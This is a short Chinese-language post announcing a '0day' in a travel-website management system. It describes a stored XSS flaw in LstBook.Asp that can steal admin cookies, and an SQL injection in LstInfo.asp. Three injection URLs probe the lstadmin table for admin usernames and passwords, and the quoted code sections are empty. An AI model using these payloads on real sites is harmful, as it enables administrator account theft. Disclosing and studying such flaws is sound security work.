雨楠旅游网服务管理系统 v2013.6.11 最新漏洞0day

漏洞-1

漏洞类型:存储型xss

代码文件:LstBook.Asp

详细代码:

————————————————————–

利用说明:以上代码都只是用trim过滤了空格而已,所以…..呵呵 可以利用此xss截取cookie进后台!

漏洞-2

漏洞类型:sql注入

代码文件:LstInfo.asp

详细代码:

————————————————

代码说明:ID变量在“”文件里面,而在conn.asp文件里面ID是用Request来获取的~!!!这样就很明显了~!

PS:下面列举3条基本测试语句。其他的自行解决!

/LstJobInfo.asp?TT=&SS=&Id=1 and exists(select * from lstadmin)

/LstJobInfo.asp?TT=&SS=&Id=1 and exists(select usradmin from lstadmin)

/LstJobInfo.asp?TT=&SS=&Id=1 and exists(select usrpass from lstadmin)

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录